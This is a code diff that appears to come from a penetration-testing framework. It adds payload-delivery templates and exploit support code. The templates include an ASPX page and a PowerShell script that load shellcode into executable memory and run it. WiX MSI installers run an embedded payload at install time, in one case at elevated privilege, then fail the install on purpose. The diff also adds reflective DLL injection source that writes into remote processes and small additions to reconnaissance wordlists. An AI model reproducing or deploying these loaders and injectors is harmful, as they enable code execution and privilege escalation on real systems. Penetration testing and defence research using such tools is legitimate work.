+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+    private static Int32 MEM_COMMIT=0x1000;
+    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
+
+    protected void Page_Load(object sender, EventArgs e)
+    {
+        %{shellcode}
+        IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
+        IntPtr %{var_threadId} = IntPtr.Zero;
+        IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
+    }
+</script>

data/templates/scripts/to_mem_dotnet.ps1.template

@@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
 $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
-%{shellcode}
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 
 $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

data/templates/src/msi/.gitignore

@@ -0,0 +1,3 @@
+*.msi
+*.wixobj
+*.wixpdb

data/templates/src/msi/COMPILING.txt

@@ -0,0 +1,7 @@
+Compile using WiX: http://wixtoolset.org
+
+Recompile with a larger buffer file to increase the available
+buffer size for larger payloads if required.
+
+candle template_x86_windows.wxs
+light template_x86_windows.wixobj

data/templates/src/msi/compile.bat

@@ -0,0 +1,18 @@
+@echo off
+REM Set PATH to location of your WiX binaries
+SET PATH=%PATH%;c:\tools\local\wix38-binaries\
+@echo on
+
+candle template_windows.wxs
+light template_windows.wixobj
+copy template_windows.msi ..\..\template_windows.msi
+del template_windows.msi
+del template_windows.wixobj
+del template_windows.wixpdb
+
+candle template_nouac_windows.wxs
+light template_nouac_windows.wixobj
+copy template_nouac_windows.msi ..\..\template_nouac_windows.msi
+del template_nouac_windows.msi
+del template_nouac_windows.wixobj
+del template_nouac_windows.wixpdb

data/templates/src/msi/template_nouac_windows.wxs

@@ -0,0 +1,38 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" InstallPrivileges="limited" />	
+	
+	<Media Id='1' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
+	<Binary Id='Payload' SourceFile='buffer' />
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='yes' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
+	<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
+	<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<!-- Define ALLUSERS with a blank value -->
+	<Property Id="ALLUSERS" Secure="yes"/>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecPayload" After="InstallInitialize" />
+		<Custom Action="FailInstallation" Before="InstallFiles" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>

data/templates/src/msi/template_windows.wxs

@@ -0,0 +1,35 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />	
+	
+	<Media Id='1' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
+	<Binary Id='Payload' SourceFile='buffer' />
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='no' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
+	<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
+	<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecPayload" After="InstallInitialize" />
+		<Custom Action="FailInstallation" Before="InstallFiles" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>

data/wordlists/http_owa_common.txt

@@ -1,5 +1,6 @@
 aspnet_client/
 Autodiscover/
+exchange/
 ecp/
 EWS/
 Microsoft-Server-ActiveSync/

data/wordlists/sap_icm_paths.txt

@@ -1,3 +1,4 @@
+/AdapterFramework/version/version.jsp
 /AdobeDocumentServices/Config
 /AdobeDocumentServices/Config?wsdl
 /AE/index.jsp
@@ -319,6 +320,7 @@
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
 /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer

data/wordlists/snmp_default_pass.txt

@@ -92,6 +92,7 @@ root
 router
 rw
 rwa
+s!a@m#n$p%c
 san-fran
 sanfran
 scotty

external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c

@@ -0,0 +1,116 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "GetProcAddressR.h"
+//===============================================================================================//
+// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
+// wont be able to resolve exported addresses in reflectivly loaded librarys.
+FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
+{
+	UINT_PTR uiLibraryAddress = 0;
+	FARPROC fpResult          = NULL;
+
+	if( hModule == NULL )
+		return NULL;
+
+	// a module handle is really its base address
+	uiLibraryAddress = (UINT_PTR)hModule;
+
+	__try
+	{
+		UINT_PTR uiAddressArray = 0;
+		UINT_PTR uiNameArray    = 0;
+		UINT_PTR uiNameOrdinals = 0;
+		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
+		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
+		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
+			
+		// get the VA of the modules NT Header
+		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
+
+		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+		// get the VA of the export directory
+		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
+			
+		// get the VA for the array of addresses
+		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
+
+		// get the VA for the array of name pointers
+		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
+				
+		// get the VA for the array of name ordinals
+		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
+
+		// test if we are importing by name or by ordinal...
+		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
+		{
+			// import by ordinal...
+
+			// use the import ordinal (- export ordinal base) as an index into the array of addresses
+			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
+
+			// resolve the address for this imported function
+			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
+		}
+		else
+		{
+			// import by name...
+			DWORD dwCounter = pExportDirectory->NumberOfNames;
+			while( dwCounter-- )
+			{
+				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
+				
+				// test if we have a match...
+				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
+				{
+					// use the functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+					
+					// calculate the virtual address for the function
+					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
+					
+					// finish...
+					break;
+				}
+						
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		fpResult = NULL;
+	}
+
+	return fpResult;
+}
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h

@@ -0,0 +1,36 @@
+//===============================================================================================//
+// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+//===============================================================================================//
+#include "ReflectiveDLLInjection.h"
+
+FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
+//===============================================================================================//
+#endif
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c

@@ -0,0 +1,233 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "LoadLibraryR.h"
+//===============================================================================================//
+DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
+{    
+	WORD wIndex                          = 0;
+	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
+	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
+	
+	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
+
+	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
+
+    if( dwRva < pSectionHeader[0].PointerToRawData )
+        return dwRva;
+
+    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
+    {   
+        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
+           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
+    }
+    
+    return 0;
+}
+//===============================================================================================//
+DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
+{
+	UINT_PTR uiBaseAddress   = 0;
+	UINT_PTR uiExportDir     = 0;
+	UINT_PTR uiNameArray     = 0;
+	UINT_PTR uiAddressArray  = 0;
+	UINT_PTR uiNameOrdinals  = 0;
+	DWORD dwCounter          = 0;
+#ifdef _WIN64
+	DWORD dwMeterpreterArch = 2;
+#else
+	// This will catch Win32 and WinRT.
+	DWORD dwMeterpreterArch = 1;
+#endif
+
+	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
+
+	// get the File Offset of the modules NT Header
+	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+	// currenlty we can only process a PE file which is the same type as the one this fuction has  
+	// been compiled as, due to various offset in the PE structures being defined at compile time.
+	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
+	{
+		if( dwMeterpreterArch != 1 )
+			return 0;
+	}
+	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
+	{
+		if( dwMeterpreterArch != 2 )
+			return 0;
+	}
+	else
+	{
+		return 0;
+	}
+
+	// uiNameArray = the address of the modules export directory entry
+	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+	// get the File Offset of the export directory
+	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
+
+	// get the File Offset for the array of name pointers
+	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
+
+	// get the File Offset for the array of addresses
+	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
+
+	// get the File Offset for the array of name ordinals
+	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
+
+	// get a counter for the number of exported functions...
+	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
+
+	// loop through all the exported functions to find the ReflectiveLoader
+	while( dwCounter-- )
+	{
+		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
+
+		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
+		{
+			// get the File Offset for the array of addresses
+			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
+	
+			// use the functions name ordinal as an index into the array of name pointers
+			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+			// return the File Offset to the ReflectiveLoader() functions code...
+			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
+		}
+		// get the next exported function name
+		uiNameArray += sizeof(DWORD);
+
+		// get the next exported function name ordinal
+		uiNameOrdinals += sizeof(WORD);
+	}
+
+	return 0;
+}
+//===============================================================================================//
+// Loads a DLL image from memory via its exported ReflectiveLoader function
+HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
+{
+	HMODULE hResult                    = NULL;
+	DWORD dwReflectiveLoaderOffset     = 0;
+	DWORD dwOldProtect1                = 0;
+	DWORD dwOldProtect2                = 0;
+	REFLECTIVELOADER pReflectiveLoader = NULL;
+	DLLMAIN pDllMain                   = NULL;
+
+	if( lpBuffer == NULL || dwLength == 0 )
+		return NULL;
+
+	__try
+	{
+		// check if the library has a ReflectiveLoader...
+		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
+		if( dwReflectiveLoaderOffset != 0 )
+		{
+			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
+
+			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
+			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
+			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
+			{
+				// call the librarys ReflectiveLoader...
+				pDllMain = (DLLMAIN)pReflectiveLoader();
+				if( pDllMain != NULL )
+				{
+					// call the loaded librarys DllMain to get its HMODULE
+					// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
+					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
+						hResult = NULL;
+				}
+				// revert to the previous protection flags...
+				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
+			}
+		}
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		hResult = NULL;
+	}
+
+	return hResult;
+}
+//===============================================================================================//
+// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
+// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
+//       defined in order to use the correct RDI prototypes.
+// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
+//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
+// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
+// Note: This function currently cant inject accross architectures, but only to architectures which are the 
+//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
+HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
+{
+	LPVOID lpRemoteLibraryBuffer              = NULL;
+	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
+	HANDLE hThread                            = NULL;
+	DWORD dwReflectiveLoaderOffset            = 0;
+	DWORD dwThreadId                          = 0;
+
+	__try
+	{
+		do
+		{
+			if( !hProcess  || !lpBuffer || !dwLength )
+				break;
+
+			// check if the library has a ReflectiveLoader...
+			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
+			if( !dwReflectiveLoaderOffset )
+				break;
+
+			// alloc memory (RWX) in the host process for the image...
+			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
+			if( !lpRemoteLibraryBuffer )
+				break;
+
+			// write the image into the host process...
+			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
+				break;
+
+			// add the offset to ReflectiveLoader() to the remote library address...
+			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
+
+			// create a remote thread in the host process to call the ReflectiveLoader!
+			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
+
+		} while( 0 );
+
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		hThread = NULL;
+	}
+
+	return hThread;
+}
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h

@@ -0,0 +1,41 @@
+//===============================================================================================//
+// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
+#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
+//===============================================================================================//
+#include "ReflectiveDLLInjection.h"
+
+DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
+
+HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
+
+HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
+
+//===============================================================================================//
+#endif
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h

@@ -0,0 +1,53 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+// we declare some common stuff in here...
+
+#define DLL_METASPLOIT_ATTACH	4
+#define DLL_METASPLOIT_DETACH	5
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
+typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
+
+#define DLLEXPORT   __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//

